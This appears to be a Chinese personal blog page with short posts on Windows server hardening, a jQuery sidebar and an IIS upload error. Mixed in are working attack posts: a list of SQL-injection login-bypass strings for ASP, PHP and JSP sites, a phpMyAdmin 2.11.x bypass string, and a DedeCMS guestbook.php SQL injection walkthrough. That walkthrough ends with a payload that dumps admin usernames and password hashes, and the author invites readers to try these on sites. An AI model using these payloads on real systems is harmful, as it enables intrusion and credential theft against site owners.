随身笔记

博客

  • 服务器安全配置之Wscript.shell利弊

    Wscrip.shell是Windows自带的组件.因为它过于强大。所以经常被黑客加以利用。它可以调用系统内核运行的DOS墓本命令,与此对应的还有三个危险组件.它们分别是:FSO,Shall.Application, WScript.Network.这几个组件的存在与否直接关系到黑客是否能
    成功攻陷你的服务器。所以,在不需要这些组件的情况下.我们应该尽最避免这些组件的存在。Wscrpp.shell可以通过在运行里输入:

    regsvr32/。c:\winnt\system32\wshom.ocx命令来卸载,

    而 Shell.application组件可以通过在运行里输入:

    regsvr32 /u c:\winnt\system32\shell32.dll命今来卸载。

  • 万能密码汇总

    asp aspx万能密码

    1:”or “a”=”a
    2: ‘)or(‘a’=’a

    3:or 1=1–
    4:’or 1=1–
    5:a’or’ 1=1–
    6:”or 1=1–
    7:’or’a’=’a
    8:”or”=”a’=’a
    9:’or”=’
    10:’or’=’or’
    11:   1 or ‘1’=’1’=1
    12:   1 or ‘1’=’1′ or 1=1
    13:   ‘OR 1=1%00
    14:   “or 1=1%00
    15: ‘xor
    16:   用户名   ‘ UNION Select 1,1,1 FROM admin Where ”=’     (替换表名admin)   密码 1

    PHP万能密码

    ‘or 1=1/*

    jsp 万能密码

    1’or’1’=’1

    phpmyadmin 2.11.4万能密码漏洞

    phpmyadmin 2.11.4

    phpmyadmin 2.11.3

    两个版本都有此漏洞

    我去测试了一下 确实可以用。。。

    你们可以试一下

    只需要输入账号  密码不需要输入

    利用代码如下:
    ‘localhost’@’@”

  • jquery实现wordpress侧边栏 固定位置

    关键字:侧边 悬浮 滚动 固定位置 相对定位fixed

    jquery实现wordpress侧边栏随滚动条滚动至指定的区域内就停止移动就像本站的右侧一样,现在教大家如何实现这效果。
    基本流程是首先加载jquery库,之后在加载sidebar-follow-jquery.js文件。

    接着就是你需要移动的div最重要的是在你需要移动的div后面紧加上以下代码:

    <script>(new SidebarFollow()).init({
    element: jQuery(‘#content_right’),
    prevElement: jQuery(‘#xsnazzy’),
    distanceToTop: 2
    });</script>

    总结下步骤因为对初学者来说还是有点难度的当初我用的时候看了好半天才做出来:
    1,加载jquery库
    2,加载sidebar-follow-jquery.js文件
    3,需要移动的div层
    4,添加以上给出的代码
    顺序不能乱。
    现在教详细的写法就拿本站为例子讲解,本站的CSS样式部分是这样的:

    <div style=”width:260px; float:right; height:0px;”>//这层是定位作用width自行修改height不必修改
    <div id=”content_right”> //这里就是需要移动的内容层
    </div>
    </div>

    接下来就是分析以下代码:

    <script>(new SidebarFollow()).init({
    element: jQuery(‘这里是需要移动的层的ID名字’),
    prevElement: jQuery(‘当移到这里就停止的层的ID名字’),
    distanceToTop: 2
    });</script>

    基本就这样,这里顺便鄙视下故意教一半就不教或者是教的模模糊糊的故意卖弄技术的人。
    sidebar-follow-jquery.js下载

  • dedecms 最新sql注射漏洞利用guestbook.php

    漏洞成功需要条件:
    1. php magic_quotes_gpc=off
    2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在。
    怎么判断是否存在漏洞:
    先打开www.xxx.com/plus/guestbook.php  可以看到别人的留言,
    然后鼠标放在 [回复/编辑]   上 可以看到别人留言的ID。那么记下ID
    访问:
    1 www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc’&id=存在的留言ID
    提交后如果是dede5.7版本的话 会出现 “成功更改或回复一条留言” 那就证明修改成功了
    跳回到www.xxx.com/plus/guestbook.php 看下你改的那条留言ID是否变成了 errs.cc’ 如果变成了 那么证
    明漏洞无法利用应为他开启了 php magic_quotes_gpc=off
    如果没有修改成功,那留言ID的内容还是以前的 那就证明漏洞可以利用。
    那么再次访问
    1 www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=’,msg=user(),email=’
    然后返回,那条留言ID的内容就直接修改成了mysql 的user().
    大概利用就是这样,大家有兴趣的多研究下!!
    最后补充下,估计有人会说怎么暴管理后台帐户密码,你自己研究下 会知道的。反正绝对可以暴出来(不可以暴出来我就不会发)!!
    1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=’,msg=@`’`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email=’

  • IIS7请求对象错误 ASP 0104 : 80004005′

    症状
    上传文件到 windows  server + iis 6.0或者iis7.0 服务器的时候遇到下列错误:

    请求对象错误 ‘asp 0104 : 80004005′

    操作被禁止

    决解办法:

    双击–在“行为”栏处展开–“限制属性”–修改“最大请求实体主体限制”将数值修改大点就行了